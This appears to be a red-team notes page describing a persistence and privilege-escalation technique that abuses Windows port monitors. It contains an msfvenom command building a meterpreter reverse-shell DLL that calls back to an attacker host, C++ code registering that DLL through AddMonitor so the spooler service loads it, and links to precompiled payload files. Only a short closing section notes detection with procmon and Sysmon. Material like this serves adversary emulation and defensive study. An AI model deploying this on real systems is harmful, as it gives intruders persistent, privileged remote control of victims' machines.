search

AddMonitor()

Persistence, Privilege Escalation

hashtag
Execution

Generating a 64-bit meterpreter payload to be injected into the spoolsv.exe:

attacker@local
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f dll > evil64.dll

Writing and compiling a simple C++ code that will register the monitor port:

monitor.cpp
#include "stdafx.h"
#include "Windows.h"

int main() {	
	MONITOR_INFO_2 monitorInfo;
	TCHAR env[12] = TEXT("Windows x64");
	TCHAR name[12] = TEXT("evilMonitor");
	TCHAR dll[12] = TEXT("evil64.dll");
	monitorInfo.pName = name;
	monitorInfo.pEnvironment = env;
	monitorInfo.pDLLName = dll;
	AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
	return 0;
}
file-download
59KB
T1013-PortMonitor64.exe
arrow-up-right-from-squareOpen
PortMonitor64
file-download
5KB
evil64.dll
arrow-up-right-from-squareOpen
evil64.dll - meterpreter payload

Move evil64.dll to %systemroot% and execute the compiled monitor.cpp.

hashtag
Observations

Upon launching the compiled executable and inspecting the victim machine with procmon, we can see that the evil64.dll is being accessed by the spoolsvc:

which eventually spawns a rundll32 with meterpreter payload, that initiates a connection back to the attacker:

The below confirms the procmon results explained above:

Sysmon commandline arguments and network connection logging to the rescue:

hashtag
References

LogoBoot or Logon Autostart Execution: Port Monitors, Sub-technique T1547.010 - Enterprise | MITRE ATT&CK®attack.mitre.orgchevron-right
LogoAddMonitor function (Winspool.h) - Win32 appsMicrosoftLearnchevron-right
LogoMONITOR_INFO_2 structure (Winspool.h) - Win32 appsMicrosoftLearnchevron-right

PreviousCreate AccountNextNetSh Helper DLL

Last updated